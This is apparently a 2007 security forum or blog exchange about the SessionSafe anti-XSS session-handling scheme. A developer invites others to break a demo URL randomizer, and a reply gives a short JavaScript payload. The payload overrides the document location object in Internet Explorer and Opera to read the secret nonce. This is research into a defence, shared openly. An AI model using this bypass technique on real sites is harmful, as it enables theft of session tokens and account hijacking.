Main

March 28, 2007

Re: SessionSafe: Implementing XSS Immune Session Handling

Re: SessionSafe: Implementing XSS Immune Session Handling
Posted by: majohn (IP Logged)
Date: March 08, 2007 04:46AM

ok, stop talking, let's break some code :) I found my old PoC-Code and put it (temporarily) online: [onetimeurls.databasement.net] (please notice: this is only a demo of the URLRandomizer not a full SessionSafe-PoC)

I genuinely would be interested if it is possible to steal the nonce from the url_randomizer object.

Re: SessionSafe: Implementing XSS Immune Session Handling - sla.ckers.org

Well, you can, by replacing the location object on Internet Explorer and Opera. I came to know the attack through the comments on snippets from shinichitomita’s journal. Thanks to nanto_vi-san.

Copy the below exploit onto the textarea of onetimeurls.databasement.net.

<script>
var document = { location: { href: '' } };
(function () {
  if (document.location.href == '') {
    setTimeout(arguments.callee, 1000);
  } else {
    alert(document.location.href);
  }
})();
</script>